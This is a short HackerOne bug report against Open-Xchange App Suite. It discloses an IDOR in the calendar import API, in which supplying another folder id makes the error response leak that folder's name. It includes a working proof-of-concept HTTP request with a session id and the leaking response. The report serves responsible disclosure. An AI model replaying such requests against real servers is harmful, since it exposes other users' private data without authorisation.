Open-Xchange: IDOR - Leaking other user's folder names from /appsuite/api/import?action=ICA

2017-01-18T08:20:03
ID H1:199281
Type hackerone
Reporter inhibitor181
Modified 2017-09-28T07:20:01

Description

Hello, I have found a point in the appointments API import that leaks the folder names from other users (or the system folder names).

POC

``` POST /appsuite/api/import?action=ICAL&folder=6&ignoreUIDs=false&session=56ab07c24398421990bc6820eeeff6cc HTTP/1.1 Host: sandbox.open-xchange.com /**/

------WebKitFormBoundary2ifChYfhFg5DU62P Content-Disposition: form-data; name="file"; filename="export.ics" Content-Type: text/calendar

/ Some calendar data /

------WebKitFormBoundary2ifChYfhFg5DU62P-- ```

Response :

``` HTTP/1.1 200 OK Server: nginx /**/

<!DOCTYPE html><html><head><META http-equiv="Content-Type" content="text/html; charset=UTF-8"><script type="text/javascript">(parent["callback_import"] || window.opener && window.opener["callback_import"])({"error":"Can not import the format ICAL into folder system_ldap.","error_params":["system_ldap","ICAL"],"categories":"ERROR","category":8,"code":"I_E-0500","error_id":"1561167371-118078","error_desc":"Can not import the format ICAL into folder system_ldap."})</script></head></html> ```

Folder name is leaked in error_params, error and error_desc

Video POC attached.